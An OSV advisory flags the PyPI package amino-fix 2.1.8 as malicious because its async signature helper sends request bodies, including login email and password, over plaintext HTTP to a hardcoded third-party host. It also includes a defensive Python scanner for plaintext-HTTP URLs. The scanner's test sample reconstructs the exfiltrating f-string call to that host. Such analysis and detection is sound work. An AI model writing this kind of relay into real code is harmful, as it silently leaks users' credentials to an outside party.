amino-fix @2.1.8
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-3686
Ecosystem
pypi
Summary
The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password), the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and all other request bodies) as URL query parameters to aminoed.uk.to, a free .uk.to subdomain unrelated to the real Amino service (service.narvii.com). This is a textbook silent relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS. A secondary import-time version check against pypi.org is benign (data-only, printed to stdout) and not a dropper, but is noted as an unrelated quality issue.
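The pattern the summary describes (a hardcoded plaintext-HTTP endpoint with caller-supplied data interpolated into its query string) is cheap to detect statically before a dependency is vendored. The following is an added example, not code from the advisory or from the amino-fix package: a small AST-based scanner that walks Python source and reports `http://` URL literals, escalating when request data is interpolated after the `?`. The sample module it scans is constructed to mirror the helper the advisory describes (only the endpoint string is taken from the advisory text); the aiohttp usage, variable names and the healthy HTTPS line are assumptions for illustration.

```python
"""Flag hardcoded plaintext-HTTP URLs in Python source, with extra weight when
caller data is interpolated into the query string (the silent-relay shape).

Added example for the advisory above; not part of the advisory or the package.
"""
import ast
from dataclasses import dataclass


@dataclass
class Finding:
    line: int
    url: str
    reason: str


class _PlaintextUrlVisitor(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []

    def _check(self, node: ast.AST, literal: str, prefix: "str | None") -> None:
        # prefix: literal text before the first interpolation, or None if the
        # URL is a plain constant with nothing interpolated into it.
        if not literal.lower().startswith("http://"):
            return
        if prefix is not None and "?" in prefix:
            reason = "caller data interpolated into the query string of a plaintext HTTP URL"
        elif prefix is not None:
            reason = "plaintext HTTP URL with an interpolated component"
        else:
            reason = "hardcoded plaintext HTTP URL"
        self.findings.append(Finding(node.lineno, literal, reason))

    def visit_Constant(self, node: ast.Constant) -> None:
        if isinstance(node.value, str):
            self._check(node, node.value, None)

    def visit_JoinedStr(self, node: ast.JoinedStr) -> None:
        # f-string: gather literal parts, remember what precedes the first {…}
        literal_parts, prefix_parts, seen_interp = [], [], False
        for part in node.values:
            if isinstance(part, ast.FormattedValue):
                seen_interp = True
            elif isinstance(part, ast.Constant) and isinstance(part.value, str):
                literal_parts.append(part.value)
                if not seen_interp:
                    prefix_parts.append(part.value)
        self._check(node, "".join(literal_parts),
                    "".join(prefix_parts) if seen_interp else None)
        # Do not descend: the inner Constant would otherwise be reported twice.

    def visit_Call(self, node: ast.Call) -> None:
        # "http://host/path?data={}".format(body) style
        func = node.func
        if (isinstance(func, ast.Attribute) and func.attr == "format"
                and isinstance(func.value, ast.Constant)
                and isinstance(func.value.value, str)):
            literal = func.value.value
            prefix = literal.split("{", 1)[0] if "{" in literal else None
            self._check(node, literal, prefix)
            for arg in node.args:          # still inspect the arguments
                self.visit(arg)
            for kw in node.keywords:
                self.visit(kw.value)
            return
        self.generic_visit(node)


def scan_source(source: str) -> list[Finding]:
    """Return every plaintext-HTTP URL literal found in `source`."""
    visitor = _PlaintextUrlVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


# Constructed sample mirroring the described helper; not the package's code.
SAMPLE = '''\
import aiohttp

async def signature(data: str) -> str:
    # constructed stand-in for the helper the advisory describes
    async with aiohttp.ClientSession() as session:
        url = f"http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data}"
        async with session.get(url) as resp:
            return (await resp.json())["signature"]

VERSION_URL = "https://pypi.org/pypi/amino-fix/json"   # TLS: not flagged
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"line {f.line}: {f.reason}: {f.url}")
```

Run over a freshly unpacked sdist or wheel (`scan_source(path.read_text())` per `.py` file) the scanner produces one finding for the sample above, at the f-string line, with the query-string reason; the HTTPS version-check URL is left alone. It is deliberately narrow (literal URLs and `.format` calls only), so treat a hit as a prompt for manual review of where the request data comes from, not as a verdict.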
Source: amazon-inspector (807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44)